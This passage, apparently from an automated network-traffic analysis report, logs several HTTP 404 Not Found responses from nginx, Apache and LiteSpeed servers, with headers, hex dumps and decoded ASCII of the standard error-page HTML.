            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 23 May 2024 13:16:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:17:11 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:17:13 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:17:16 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:17:19 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:17:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:17:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:17:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
